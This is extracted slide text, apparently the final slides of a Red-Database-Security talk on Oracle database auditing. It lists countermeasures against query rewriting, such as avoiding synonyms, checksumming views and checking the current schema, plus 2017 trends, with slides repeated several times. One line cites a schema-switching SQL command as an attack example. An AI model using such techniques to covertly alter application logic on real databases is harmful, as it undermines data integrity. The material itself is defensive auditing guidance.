Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany